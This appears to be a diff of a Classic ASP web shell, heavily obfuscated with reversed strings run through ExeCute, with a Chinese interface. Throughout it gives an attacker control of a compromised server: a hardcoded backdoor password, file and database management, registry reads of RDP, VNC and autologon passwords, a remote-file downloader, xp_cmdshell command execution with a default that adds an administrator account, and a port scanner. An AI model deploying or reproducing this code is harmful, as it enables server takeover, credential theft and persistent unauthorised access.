rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End 